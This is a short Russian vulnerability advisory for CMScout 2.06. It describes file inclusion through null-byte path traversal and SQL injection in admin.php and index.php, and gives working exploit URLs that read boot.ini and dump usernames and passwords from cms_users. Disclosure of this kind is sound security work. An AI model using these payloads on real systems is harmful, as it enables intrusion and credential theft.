Хакер #305. Многошаговые SQL-инъекции
Программа: CMScout 2.06
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения и выполнить произвольный PHP сценарий на
целевой системе.
1) Уязвимость существует из-за недостаточной обработки входных данных
сценариями admin.php и index.php. Удаленный пользователь может выполнить
произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Эксплоит:
http://[target]/[path]/admin.php?bit=../../../../../boot.ini%00
http://[target]/[path]/index.php?bit=../../../../boot.ini%00
2) Уязвимость существует из-за недостаточной обработки входных данных
сценариями admin.php и index.php. Удаленный пользователь может с помощью
специально сформированного запроса выполнить произвольные SQL команды в базе
данных приложения.
Эксплоит:
http://[target]/[path]/index.php?page=mythings&cat=downloads&action=edit&id=null
union all select 1,2,3,4,concat_ws(0x3a,uname,passwd),6,7,8,9,10,11 from
cms_users--
http://[target]/[path]/admin.php?page=users&subpage=users_view&id=null union
all select
1,2,concat_ws(0x3a,uname,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40
from cms_users--